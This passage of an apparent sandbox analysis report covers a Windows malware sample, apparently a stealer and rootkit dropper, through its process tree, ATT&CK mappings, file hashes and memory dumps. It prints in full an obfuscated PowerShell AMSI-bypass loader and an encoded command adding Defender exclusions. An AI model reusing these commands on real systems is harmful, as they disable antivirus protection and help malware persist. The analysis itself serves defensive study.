PID 5168 wrote to memory of 1968	5168	dllhost.exe	svchost.exe
PID 5168 wrote to memory of 2000	5168	dllhost.exe	svchost.exe
PID 5168 wrote to memory of 1876	5168	dllhost.exe	spoolsv.exe
PID 5168 wrote to memory of 2128	5168	dllhost.exe	svchost.exe
PID 5168 wrote to memory of 2200	5168	dllhost.exe	svchost.exe
PID 5168 wrote to memory of 2236	5168	dllhost.exe	svchost.exe
PID 5168 wrote to memory of 2408	5168	dllhost.exe	svchost.exe
PID 5168 wrote to memory of 2416	5168	dllhost.exe	svchost.exe
PID 5168 wrote to memory of 2592	5168	dllhost.exe	sihost.exe
PID 5168 wrote to memory of 2620	5168	dllhost.exe	svchost.exe
PID 5168 wrote to memory of 2668	5168	dllhost.exe	svchost.exe
PID 5168 wrote to memory of 2724	5168	dllhost.exe	sysmon.exe
PID 5168 wrote to memory of 2752	5168	dllhost.exe	svchost.exe
PID 5168 wrote to memory of 2760	5168	dllhost.exe	svchost.exe
PID 5168 wrote to memory of 2776	5168	dllhost.exe	svchost.exe
PID 5168 wrote to memory of 2968	5168	dllhost.exe	taskhostw.exe
PID 5168 wrote to memory of 2996	5168	dllhost.exe	unsecapp.exe
PID 5168 wrote to memory of 2332	5168	dllhost.exe	svchost.exe
PID 5168 wrote to memory of 3460	5168	dllhost.exe	svchost.exe
PID 5168 wrote to memory of 3536	5168	dllhost.exe	Explorer.EXE
PID 5168 wrote to memory of 3680	5168	dllhost.exe	svchost.exe
PID 5168 wrote to memory of 3860	5168	dllhost.exe	DllHost.exe
PID 5168 wrote to memory of 4056	5168	dllhost.exe	RuntimeBroker.exe
PID 5168 wrote to memory of 3932	5168	dllhost.exe	RuntimeBroker.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:616
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:60
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{cfb997a3-df6c-4141-8674-371152a0908b}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5168

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:964

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:736

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1028

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1136

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:1144
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2968
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:cJirDqBLlUgR{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$xismUrCCkdwfga,[Parameter(Position=1)][Type]$bkfOgLGXIc)$OTjfMSnuXqA=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+'ec'+[Char](116)+''+'e'+''+[Char](100)+''+'D'+'el'+[Char](101)+'g'+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'yD'+[Char](101)+'l'+[Char](101)+''+'g'+''+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+''+[Char](121)+'p'+[Char](101)+'',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+''+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+''+'l'+''+'e'+''+'d'+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+'s'+''+'i'+'C'+'l'+''+[Char](97)+''+'s'+'s'+','+'A'+[Char](117)+''+[Char](116)+''+[Char](111)+''+[Char](67)+'l'+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$OTjfMSnuXqA.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+'c'+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+'m'+'e,'+'H'+''+[Char](105)+'de'+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$xismUrCCkdwfga).SetImplementationFlags('R'+'u'+''+[Char](110)+''+'t'+''+[Char](105)+'m'+'e'+''+[Char](44)+''+'M'+''+[Char](97)+'n'+[Char](97)+'g'+'e'+'d');$OTjfMSnuXqA.DefineMethod(''+[Char](73)+'n'+'v'+'o'+[Char](107)+'e',''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+''+[Char](44)+''+'H'+''+'i'+'d'+'e'+'By'+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+','+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+'ual',$bkfOgLGXIc,$xismUrCCkdwfga).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+','+'M'+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $OTjfMSnuXqA.CreateType();}$CwOzglTyzKyIt=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+'.'+'d'+[Char](108)+'l')}).GetType(''+[Char](77)+'icr'+[Char](111)+''+'s'+''+'o'+''+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+''+'i'+''+[Char](110)+''+'3'+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+'n'+'s'+[Char](97)+''+[Char](102)+'e'+[Char](78)+''+[Char](97)+'t'+[Char](105)+'v'+'e'+''+[Char](77)+'eth'+[Char](111)+''+[Char](100)+'s');$UpsRVUPzQpNsVd=$CwOzglTyzKyIt.GetMethod(''+'G'+''+[Char](101)+''+'t'+'P'+'r'+''+[Char](111)+''+'c'+''+[Char](65)+''+'d'+''+[Char](100)+''+'r'+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+'bli'+'c'+''+[Char](44)+''+[Char](83)+'t'+[Char](97)+''+'t'+''+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$biamPaWEPEeQhCGzLfN=cJirDqBLlUgR @([String])([IntPtr]);$RyQKNTriuutbJzFFhubOSo=cJirDqBLlUgR @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$fzHEhFMlzwd=$CwOzglTyzKyIt.GetMethod('G'+[Char](101)+''+[Char](116)+''+'M'+'o'+'d'+''+'u'+'l'+[Char](101)+'Han'+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+'l'+[Char](51)+''+'2'+'.'+'d'+''+[Char](108)+'l')));$fLgHymuJlTHfKL=$UpsRVUPzQpNsVd.Invoke($Null,@([Object]$fzHEhFMlzwd,[Object](''+[Char](76)+''+'o'+'a'+[Char](100)+''+[Char](76)+''+[Char](105)+''+'b'+''+'r'+''+'a'+'ryA')));$MSwmgxnMbbPfnCfIy=$UpsRVUPzQpNsVd.Invoke($Null,@([Object]$fzHEhFMlzwd,[Object](''+[Char](86)+''+[Char](105)+'rt'+'u'+''+[Char](97)+''+[Char](108)+''+'P'+''+[Char](114)+''+'o'+''+[Char](116)+'e'+[Char](99)+''+'t'+'')));$yCAmxXT=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fLgHymuJlTHfKL,$biamPaWEPEeQhCGzLfN).Invoke('a'+[Char](109)+'s'+[Char](105)+''+'.'+''+'d'+''+[Char](108)+''+'l'+'');$ykGihAwoDGoagDyQA=$UpsRVUPzQpNsVd.Invoke($Null,@([Object]$yCAmxXT,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+'i'+''+[Char](83)+''+[Char](99)+''+'a'+'n'+[Char](66)+''+[Char](117)+'f'+[Char](102)+'er')));$DrAvGZskNx=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MSwmgxnMbbPfnCfIy,$RyQKNTriuutbJzFFhubOSo).Invoke($ykGihAwoDGoagDyQA,[uint32]8,4,[ref]$DrAvGZskNx);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ykGihAwoDGoagDyQA,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MSwmgxnMbbPfnCfIy,$RyQKNTriuutbJzFFhubOSo).Invoke($ykGihAwoDGoagDyQA,[uint32]8,0x20,[ref]$DrAvGZskNx);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+[Char](70)+''+[Char](84)+''+'W'+''+[Char](65)+''+'R'+''+'E'+'').GetValue(''+'$'+''+[Char](55)+'7'+'s'+''+[Char](116)+''+'a'+'g'+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:452
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVwBhAGkAdABIAGEAbgBkAGwAZQBcAFQAeQBwAGUASQBkAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVwBhAGkAdABIAGEAbgBkAGwAZQBcAFQAeQBwAGUASQBkAC4AZQB4AGUA
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:5436
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5480
- C:\Users\Admin\AppData\Roaming\WaitHandle\TypeId.exe
  C:\Users\Admin\AppData\Roaming\WaitHandle\TypeId.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:1372
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
    3⤵
    PID:5440

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1152

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1160

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1232

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1344

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1356

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1376
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2592

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1436

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1584

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1592

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1644

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1704

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1748

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1776

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1836

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1888

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1900

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1968

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2000

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1876

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2128

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2200

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2236

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2408

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2416

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2620

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2668

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2724

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2752

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2760

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2776

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2996

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2332

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3460

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of UnmapMainImage
PID:3536
- C:\Users\Admin\AppData\Local\Temp\30d31c8a72f67e34bbedc3d6fade478b913943dc7467c56dc81938272eef79a5.exe
  "C:\Users\Admin\AppData\Local\Temp\30d31c8a72f67e34bbedc3d6fade478b913943dc7467c56dc81938272eef79a5.exe"
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:4460
- - C:\Users\Admin\AppData\Local\Temp\Install1.exe
    "C:\Users\Admin\AppData\Local\Temp\Install1.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4548
- - C:\Users\Admin\AppData\Local\Temp\$77taskhostw.exe
    "C:\Users\Admin\AppData\Local\Temp\$77taskhostw.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4780
- - C:\Users\Admin\AppData\Local\Temp\$77redlin.exe
    "C:\Users\Admin\AppData\Local\Temp\$77redlin.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:4308
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4820

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3680

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3860

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4056

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3932

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:3272

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:5092

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:5016

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:2612

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4368

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:1216

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:1852

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2960

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:1604

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:1856

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3292

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3660

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:1956

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:5224

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:1284

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\$77redlin.exe

Filesize
95KB

MD5
bcbcb79606c1833ccef6ca77a7535936

SHA1
0fcbf9cd7ad1963736afac84cc56069654df3d42

SHA256
ce13808dad8149017d9dbc146681a99cd79aaa1288f890c9120a47c347c9db29

SHA512
20a3aa8046c8e3c93a9a55aa3750088da247abb11444883f8463aef0d347520c697067b5a8491de204310660cdb632b828d58898e4f65fd385cb1ec2da752391

Download Submit
C:\Users\Admin\AppData\Local\Temp\$77taskhostw.exe

Filesize
661KB

MD5
2513e26d91a03e8fbcbfd8c3f4f11f80

SHA1
dabc1fc063c86d28d6b3313cbed51334bc90a0e0

SHA256
c62bc8ed1192add4a2ce16af0fe67dfe6a061b85c1176648a3ad9856b1744966

SHA512
56b55eefc9277ba83ba1f1b7fad87166a6d5b85266be5f4a3f35cd9af36a0f0c2c51011d3f6ed5acbf8f710fe7858ce81dc09878b1f791230795f0088f29e404

Download Submit
C:\Users\Admin\AppData\Local\Temp\Install1.exe

Filesize
163KB

MD5
1a7d1b5d24ba30c4d3d5502295ab5e89

SHA1
2d5e69cf335605ba0a61f0bbecbea6fc06a42563

SHA256
b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5

SHA512
859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa

Download Submit
C:\Windows\Temp\__PSScriptPolicyTest_syfrv5r5.d25.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/452-3203-0x000001A873900000-0x000001A873922000-memory.dmp

Filesize
136KB

Download
memory/452-4154-0x000001A873970000-0x000001A87399A000-memory.dmp

Filesize
168KB

Download
memory/1372-4938-0x00000233CBDD0000-0x00000233CBE7A000-memory.dmp

Filesize
680KB

Download
memory/4308-397-0x0000000004CB0000-0x0000000004CEC000-memory.dmp

Filesize
240KB

Download
memory/4308-399-0x0000000004F20000-0x000000000502A000-memory.dmp

Filesize
1.0MB

Download
memory/4308-395-0x0000000005290000-0x00000000058A8000-memory.dmp

Filesize
6.1MB

Download
memory/4308-396-0x0000000004C10000-0x0000000004C22000-memory.dmp

Filesize
72KB

Download
memory/4308-398-0x0000000004CF0000-0x0000000004D3C000-memory.dmp

Filesize
304KB

Download
memory/4308-394-0x0000000000250000-0x000000000026E000-memory.dmp

Filesize
120KB

Download
memory/4460-0-0x0000000000400000-0x000000000055E000-memory.dmp

Filesize
1.4MB

Download
memory/4780-193-0x00000242513B0000-0x00000242514B5000-memory.dmp

Filesize
1.0MB

Download
memory/4780-169-0x00000242513B0000-0x00000242514B5000-memory.dmp

Filesize
1.0MB

Download
memory/4780-213-0x00000242513B0000-0x00000242514B5000-memory.dmp

Filesize
1.0MB

Download
memory/4780-243-0x00007FFCA95F0000-0x00007FFCAA0B1000-memory.dmp

Filesize
10.8MB

Download
memory/4780-215-0x00000242513B0000-0x00000242514B5000-memory.dmp

Filesize
1.0MB

Download
memory/4780-209-0x00000242513B0000-0x00000242514B5000-memory.dmp

Filesize
1.0MB

Download
memory/4780-207-0x00000242513B0000-0x00000242514B5000-memory.dmp

Filesize
1.0MB

Download
memory/4780-205-0x00000242513B0000-0x00000242514B5000-memory.dmp

Filesize
1.0MB

Download
memory/4780-203-0x00000242513B0000-0x00000242514B5000-memory.dmp

Filesize
1.0MB

Download
memory/4780-199-0x00000242513B0000-0x00000242514B5000-memory.dmp

Filesize
1.0MB

Download
memory/4780-197-0x00000242513B0000-0x00000242514B5000-memory.dmp

Filesize
1.0MB

Download
memory/4780-195-0x00000242513B0000-0x00000242514B5000-memory.dmp

Filesize
1.0MB

Download
memory/4780-201-0x00000242513B0000-0x00000242514B5000-memory.dmp

Filesize
1.0MB

Download
memory/4780-191-0x00000242513B0000-0x00000242514B5000-memory.dmp

Filesize
1.0MB

Download
memory/4780-189-0x00000242513B0000-0x00000242514B5000-memory.dmp

Filesize
1.0MB

Download
memory/4780-187-0x00000242513B0000-0x00000242514B5000-memory.dmp

Filesize
1.0MB

Download
memory/4780-185-0x00000242513B0000-0x00000242514B5000-memory.dmp

Filesize
1.0MB

Download
memory/4780-184-0x00000242513B0000-0x00000242514B5000-memory.dmp

Filesize
1.0MB

Download
memory/4780-179-0x00000242513B0000-0x00000242514B5000-memory.dmp

Filesize
1.0MB

Download
memory/4780-181-0x00000242513B0000-0x00000242514B5000-memory.dmp

Filesize
1.0MB

Download
memory/4780-175-0x00000242513B0000-0x00000242514B5000-memory.dmp

Filesize
1.0MB

Download
memory/4780-211-0x00000242513B0000-0x00000242514B5000-memory.dmp

Filesize
1.0MB

Download
memory/4780-167-0x00000242513B0000-0x00000242514B5000-memory.dmp

Filesize
1.0MB

Download
memory/4780-165-0x00000242513B0000-0x00000242514B5000-memory.dmp

Filesize
1.0MB

Download
memory/4780-163-0x00000242513B0000-0x00000242514B5000-memory.dmp

Filesize
1.0MB

Download
memory/4780-159-0x00000242513B0000-0x00000242514B5000-memory.dmp

Filesize
1.0MB

Download
memory/4780-157-0x00000242513B0000-0x00000242514B5000-memory.dmp

Filesize
1.0MB

Download
memory/4780-155-0x00000242513B0000-0x00000242514B5000-memory.dmp

Filesize
1.0MB

Download
memory/4780-154-0x00000242513B0000-0x00000242514B5000-memory.dmp

Filesize
1.0MB

Download
memory/4780-173-0x00000242513B0000-0x00000242514B5000-memory.dmp

Filesize
1.0MB

Download
memory/4780-171-0x00000242513B0000-0x00000242514B5000-memory.dmp

Filesize
1.0MB

Download
memory/4780-161-0x00000242513B0000-0x00000242514B5000-memory.dmp

Filesize
1.0MB

Download
memory/4780-177-0x00000242513B0000-0x00000242514B5000-memory.dmp

Filesize
1.0MB

Download
memory/4780-152-0x00000242513B0000-0x00000242514BA000-memory.dmp

Filesize
1.0MB

Download
memory/4780-4152-0x00000242514C0000-0x0000024251516000-memory.dmp

Filesize
344KB

Download
memory/4780-4153-0x0000024251520000-0x000002425156C000-memory.dmp

Filesize
304KB

Download
memory/4780-142-0x0000024236F20000-0x0000024236FCA000-memory.dmp

Filesize
680KB

Download
memory/4780-4859-0x0000024251710000-0x0000024251764000-memory.dmp

Filesize
336KB

Download
memory/4780-4917-0x00007FFCA95F0000-0x00007FFCAA0B1000-memory.dmp

Filesize
10.8MB

Download
memory/4780-141-0x00007FFCA95F3000-0x00007FFCA95F5000-memory.dmp

Filesize
8KB

Download
memory/5440-8945-0x0000000140000000-0x00000001400AA000-memory.dmp

Filesize
680KB

Download